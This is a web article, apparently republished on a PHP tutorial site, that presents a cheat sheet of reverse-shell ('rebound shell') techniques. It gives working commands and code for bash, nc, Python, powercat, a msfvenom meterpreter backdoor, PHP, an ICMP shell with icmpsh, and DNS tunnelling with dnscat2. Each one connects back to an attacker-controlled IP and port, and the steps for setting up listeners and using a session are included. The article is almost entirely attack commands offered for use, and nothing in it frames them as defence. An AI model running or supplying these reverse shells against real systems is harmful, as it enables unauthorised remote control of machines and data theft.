Home  >  Article  >  Operation and Maintenance  >  What are the rebound shells?

What are the rebound shells?

王林
王林forward
2023-05-18 22:01:042070browse

1.bash rebound

bash -i >& /dev/tcp/ip_address/port 0>&1

What are the rebound shells?

2.nc rebound

nc -e /bin/sh 192.168.2.130 4444

What are the rebound shells?

3.python

import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])

What are the rebound shells?

4.powercat

Import-Module .\powercat.ps1
powercat -c 192.168.2.130 -p 4444 -e cmd.exe

What are the rebound shells?

5.msf generates exe backdoor

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe

6.php rebound shell

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'

What are the rebound shells?

What are the rebound shells?

##7.ICMP

关闭icmp响应,不然shell一直跳,恢复是0

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python icmpsh_m.py 源 目标
python icmpsh_m.py 192.168.2.137 192.168.2.135

Running in windows7:

icmpsh.exe -t 192.168.2.137

What are the rebound shells?

What are the rebound shells?

8.DNS

https://downloads.skullsecurity.org/dnscat2/

Here we use dnscat2, here is the download, Divided into windows and linux versions, server and client.

And it is recommended to use vs2008 to compile

Installation

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
bundle install
sudo ruby ./dnscat2.rb

kali

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)
ruby dnscat2.rb xxx.com

In windows7:

./dnscat --dns server=192.168.2.130,port=53531
./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)
./dnscat xxx.com
After successful connection

What are the rebound shells?

What are the rebound shells?

View records

What are the rebound shells?

Select connection

What are the rebound shells?

Use shell

What are the rebound shells?

Return to select shell

What are the rebound shells?

Execute command

What are the rebound shells?

Other commands

quit (退出控制台)
kill <id> (中断通道)
set(设值,比如设置security=open)
windows(列举出所有的通道)
window -i <id>(连接某个通道)
连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):

clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell)
download/upload(两端之间上传下载文件)
supend(返回到上一层,等于快捷键ctrl+z)</id></id>

DNS tunnel forwarding

listen 127.0.0.1:6666 192.168.2.135:80
本机的6666就可以访问80端口

The above is the detailed content of What are the rebound shells?. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete